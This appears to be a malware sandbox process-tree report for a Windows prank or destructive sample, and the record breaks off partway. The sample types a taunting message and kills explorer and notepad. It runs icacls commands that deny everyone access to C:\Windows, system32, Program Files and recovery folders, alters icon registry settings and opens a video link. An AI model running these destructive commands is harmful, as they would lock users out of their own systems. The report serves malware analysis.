- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "b"
  2⤵
  PID:784
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:2248
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:2964
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" ","
  2⤵
  PID:3456
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:2628
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:1064
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:1588
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "u"
  2⤵
  PID:1448
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:5100
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:976
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:4276
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "n"
  2⤵
  PID:228
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "'"
  2⤵
  PID:4512
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:1340
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3104
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:3864
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "s"
  2⤵
  PID:192
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:4524
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:664
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "p"
  2⤵
  PID:4972
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:1776
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:628
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "f"
  2⤵
  PID:4992
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:4764
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "o"
  2⤵
  PID:2388
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "m"
  2⤵
  PID:3228
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:3636
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "h"
  2⤵
  PID:4752
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:3664
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:3140
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "e"
  2⤵
  PID:1800
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "."
  2⤵
  PID:472
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:1232
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "S"
  2⤵
  PID:1804
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:2308
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "a"
  2⤵
  PID:1692
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:2272
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "t"
  2⤵
  PID:3764
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:956
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "c"
  2⤵
  PID:4280
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "r"
  2⤵
  PID:1156
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "y"
  2⤵
  PID:4440
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "i"
  2⤵
  PID:3696
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "n"
  2⤵
  PID:3208
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "g"
  2⤵
  PID:3648
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:1288
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" " "
  2⤵
  PID:1812
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1100
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4792
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:4600
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:3776
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1864
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4952
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1648
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1516
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:2588
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:2008
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3728
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:5096
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3440
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1600
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4956
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1032
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1940
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3304
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1632
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:2420
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:2052
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:436
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:920
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:4312
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:1904
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:1704
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "H"
  2⤵
  PID:3952
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "A"
  2⤵
  PID:3420
- C:\Windows\system32\wscript.exe
  wscript.exe "C:\type.vbs" "!"
  2⤵
  PID:4800
- C:\Windows\system32\taskkill.exe
  taskkill /f /im notepad.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2580
- C:\Windows\system32\icacls.exe
  icacls "C:\Program Files" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2584
- C:\Windows\system32\icacls.exe
  icacls "C:\ProgramData" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2748
- C:\Windows\system32\icacls.exe
  icacls "C:\System Volume Information" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:1348
- C:\Windows\system32\icacls.exe
  icacls "C:\Recovery" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:3764
- C:\Windows\system32\icacls.exe
  icacls "C:\$RECYCLE.BIN" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4220
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\config" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:4812
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\system32" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2676
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\system" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:2484
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\winsxs" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:1824
- C:\Windows\system32\icacls.exe
  icacls "C:\Windows\SysWOW64" /deny Everyone:(OI)(CI)F
  2⤵
  - Modifies file permissions
  PID:3716
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconSpacing /t REG_SZ /d -1500 /f
  2⤵
  PID:3720
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconVerticalSpacing /t REG_SZ /d -1500 /f
  2⤵
  PID:784
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v Shell Icon Size /t REG_SZ /d 32 /f
  2⤵
  PID:768
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics" /v IconFont /t REG_DWORD /d 0 /f
  2⤵
  PID:2248
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_SZ /d "C:\ProgramData\Microsoft\Device Stage\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico" /f
  2⤵
  - Modifies File Icons
  PID:2220
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5068
- C:\Windows\system32\mode.com
  mode con: cols=50 lines=3
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://youtu.be/Ys_F9bsrWkg
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:4580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x14c,0x150,0x154,0x11c,0x158,0x7fff284c46f8,0x7fff284c4708,0x7fff284c4718
    3⤵
    PID:1324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
    3⤵
    PID:4752
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
    3⤵
    PID:1500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
    3⤵
    PID:4812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1
    3⤵
    PID:1628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
    3⤵
    PID:3720
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
    3⤵
    PID:3156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5300 /prefetch:8
    3⤵
    PID:1300
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
    3⤵
    PID:5944
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6876 /prefetch:8
    3⤵
    PID:5168
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
    3⤵
    PID:5400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6820 /prefetch:8
    3⤵
    PID:5480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:1
    3⤵
    PID:5432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:1
    3⤵
    PID:5972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5432 /prefetch:8
    3⤵
    PID:5600
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 /prefetch:8
    3⤵
    PID:2512
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
    3⤵
    - Drops file in Program Files directory
    PID:4124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff6f4ee5460,0x7ff6f4ee5470,0x7ff6f4ee5480
      4⤵
      PID:5372
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7388 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
    3⤵
    PID:632
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
    3⤵
    PID:5908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
    3⤵
    PID:4808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
    3⤵
    PID:2972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
    3⤵
    PID:4588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6656 /prefetch:8
    3⤵
    PID:6764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
    3⤵
    PID:7056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7768 /prefetch:1
    3⤵
    PID:6732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7728 /prefetch:8
    3⤵
    PID:6824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8744 /prefetch:8
    3⤵
    PID:5688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8764 /prefetch:1
    3⤵
    PID:772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8800 /prefetch:8
    3⤵
    PID:6492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
    3⤵
    PID:1576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1808 /prefetch:8
    3⤵
    PID:6444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8664 /prefetch:1
    3⤵
    PID:3716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8804 /prefetch:8
    3⤵
    PID:6460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8960 /prefetch:1
    3⤵
    PID:6728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
    3⤵
    PID:7044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9188 /prefetch:8
    3⤵
    PID:3324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,2298036607252896046,14840233842436936438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:1
    3⤵
    PID:6540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
